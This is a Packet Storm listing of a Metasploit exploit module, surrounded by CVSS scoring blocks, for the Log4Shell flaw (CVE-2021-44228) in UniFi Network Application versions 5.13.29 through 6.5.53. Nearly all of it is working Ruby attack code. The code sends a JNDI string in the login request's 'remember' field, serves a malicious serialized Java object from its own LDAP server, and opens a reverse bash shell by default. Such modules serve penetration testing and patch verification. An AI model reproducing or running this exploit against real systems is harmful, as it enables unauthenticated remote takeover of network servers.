Lucene search

K
packetstormSpencer McIntyre, RageLtMan, Nicholas Anastasi, metasploit.comPACKETSTORM:165673
HistoryJan 24, 2022 - 12:00 a.m.

UniFi Network Application Unauthenticated Log4Shell Remote Code Execution

2022-01-2400:00:00
Spencer McIntyre, RageLtMan, Nicholas Anastasi, metasploit.com
packetstormsecurity.com
561

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C

`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
class MetasploitModule < Msf::Exploit::Remote  
Rank = ExcellentRanking  
  
include Msf::Exploit::Remote::JndiInjection  
include Msf::Exploit::Remote::HttpClient  
prepend Msf::Exploit::Remote::AutoCheck  
  
def initialize(_info = {})  
super(  
'Name' => 'UniFi Network Application Unauthenticated JNDI Injection RCE (via Log4Shell)',  
'Description' => %q{  
The Ubiquiti UniFi Network Application versions 5.13.29 through 6.5.53 are affected by the Log4Shell  
vulnerability whereby a JNDI string can be sent to the server via the 'remember' field of a POST request to the  
/api/login endpoint that will cause the server to connect to the attacker and deserialize a malicious Java  
object. This results in OS command execution in the context of the server application.  
  
This module will start an LDAP server that the target will need to connect to.  
},  
'Author' => [  
'Spencer McIntyre', # this exploit module and JNDI/LDAP lib stuff  
'RageLtMan <rageltman[at]sempervictus>', # JNDI/LDAP lib stuff  
'Nicholas Anastasi' # Unifi research  
],  
'References' => [  
[ 'CVE', '2021-44228' ],  
[ 'URL', 'https://www.sprocketsecurity.com/blog/another-log4j-on-the-fire-unifi' ],  
[ 'URL', 'https://github.com/puzzlepeaches/Log4jUnifi' ],  
[ 'URL', 'https://community.ui.com/releases/UniFi-Network-Application-6-5-54/d717f241-48bb-4979-8b10-99db36ddabe1' ]  
],  
'DisclosureDate' => '2021-12-09',  
'License' => MSF_LICENSE,  
'DefaultOptions' => {  
'RPORT' => 8443,  
'SSL' => true,  
'WfsDelay' => 30  
},  
'DefaultTarget' => 1,  
'Targets' => [  
[  
'Windows', {  
'Platform' => 'win'  
},  
],  
[  
'Unix', {  
'Platform' => 'unix',  
'Arch' => [ARCH_CMD],  
'DefaultOptions' => {  
'PAYLOAD' => 'cmd/unix/reverse_bash'  
}  
},  
]  
],  
'Notes' => {  
'Stability' => [CRASH_SAFE],  
'SideEffects' => [IOC_IN_LOGS],  
'AKA' => ['Log4Shell', 'LogJam'],  
'Reliability' => [REPEATABLE_SESSION]  
}  
)  
register_options([  
OptString.new('TARGETURI', [ true, 'Base path', '/'])  
])  
end  
  
def wait_until(&block)  
datastore['WfsDelay'].times do  
break if block.call  
  
sleep(1)  
end  
end  
  
def check  
validate_configuration!  
res = send_request_cgi('uri' => normalize_uri(target_uri, 'status'))  
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?  
  
server_version = res.get_json_document.dig('meta', 'server_version')  
return Exploit::CheckCode::Safe('The target service does not appear to be running.') unless server_version =~ /(\d+\.)+/  
  
vprint_status("Detected version: #{server_version}")  
server_version = Rex::Version.new(server_version)  
if server_version < Rex::Version.new('5.13.29')  
return Exploit::CheckCode::Safe('Versions prior to 5.13.29 are not exploitable.')  
elsif server_version > Rex::Version.new('6.5.53')  
return Exploit::CheckCode::Safe('Versions after 6.5.53 are patched and not affected.')  
end  
  
vprint_status('The target appears to be a vulnerable version, attempting to trigger the vulnerability...')  
  
start_service  
res = trigger  
return Exploit::CheckCode::Unknown('No HTTP response was received.') if res.nil?  
  
wait_until { @search_received }  
@search_received ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Unknown('No LDAP search query was received.')  
ensure  
stop_service  
end  
  
def build_ldap_search_response_payload  
return [] if @search_received  
  
@search_received = true  
  
return [] unless @exploiting  
  
print_good('Delivering the serialized Java object to execute the payload...')  
build_ldap_search_response_payload_inline('BeanFactory')  
end  
  
def trigger  
@search_received = false  
# HTTP request initiator  
send_request_cgi(  
'uri' => normalize_uri(target_uri, 'api', 'login'),  
'method' => 'POST',  
'ctype' => 'application/json',  
'data' => {  
'username' => rand_text_alphanumeric(8..16), # can not be blank!,  
'password' => rand_text_alphanumeric(8..16), # can not be blank!  
'remember' => jndi_string,  
'strict' => true  
}.to_json  
)  
end  
  
def exploit  
validate_configuration!  
  
@exploiting = true  
start_service  
res = trigger  
fail_with(Failure::Unreachable, 'Failed to trigger the vulnerability') if res.nil?  
  
msg = res.get_json_document.dig('meta', 'msg')  
if res.code == 400 && msg == 'api.err.Invalid' # returned by versions before 5.13.29  
fail_with(Failure::NotVulnerable, 'The target is not vulnerable')  
end  
  
unless res.code == 400 && msg == 'api.err.InvalidPayload' # returned by versions after 5.13.29 (including patched ones)  
fail_with(Failure::UnexpectedReply, 'The server replied to the trigger in an unexpected way')  
end  
  
wait_until { @search_received && (!handler_enabled? || session_created?) }  
handler  
ensure  
cleanup  
end  
end  
`

10 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

CHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

9.3 High

CVSS2

Access Vector

NETWORK

Access Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

COMPLETE

Integrity Impact

COMPLETE

Availability Impact

COMPLETE

AV:N/AC:M/Au:N/C:C/I:C/A:C